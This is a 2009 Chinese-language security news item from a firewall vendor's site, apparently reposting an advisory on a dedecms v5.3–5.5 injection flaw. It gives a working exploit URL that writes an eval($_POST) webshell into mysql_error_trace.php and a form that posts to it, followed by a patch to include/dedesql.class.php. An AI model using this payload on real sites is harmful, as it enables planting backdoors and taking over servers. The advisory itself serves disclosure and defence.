English
 电子信箱
 加入收藏

  威盾防火墙 >> 新闻中心 >> 业界动态 >> 织梦(dedecms)存在注入漏洞

 

织梦(dedecms)存在注入漏洞

威盾防火墙 2009-08-31

 

    影响版本:

  dedecms v5.3–5.5

  漏洞描述:

  利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。

  1. 访问网址:

  http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval(_POST[x]);var_dump(3);?>

  可看见错误信息

  2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。

  int(3) Error: Illegal double ’1024e1024’ value found during parsing

  Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

  3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是

  <form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>

  按确定后的看到第2步骤的信息表示文件木马上传成功。

  <*参考

  http://www.fuckhacker.net/archives/409/

  *>

  SEBUG安全建议:

  临时解决方案

  打开文件 include/dedesql.class.php

  找到代码

  @fwrite(fp, ‘<’.’?php’.”/*{savemsg}*/?”.”>”);

  替换代码

  @fwrite(fp, ‘<’.’?php’.”exit;/*{savemsg}*/?”.”>”);

  清空 data/mysql_error_trace.php 文件内容


相关内容: 最新内容:
研究专家曝光思科无线局域网漏洞[2009-08-29]
Twitter再爆安全漏洞黑客可短信息中插恶意代码[2009-08-28]
Google修复Chrome高危漏洞Mozilla赞扬[2009-08-27]
黑客借思科系统无线接入点漏洞入侵网络[2009-08-27]
Windows 7安全漏洞少于XP 安全性更高[2009-08-22]
荣誉勋章漏洞将封堵PSP系统近期可能升级[2009-08-17]
Adobe的自动更新存在严重的安全隐患[2009-08-31]
自动判别浏览器黑客“越狱”日趋精确[2009-08-29]
台当局澄清网站被黑客入侵传闻:是网友恶作剧[2009-08-29]
央视曝光手机WAP网站成色情网站绿色通道[2009-08-29]
OS X 恶意软件检测只能识别两个木马[2009-08-29]
研究专家曝光思科无线局域网漏洞[2009-08-29]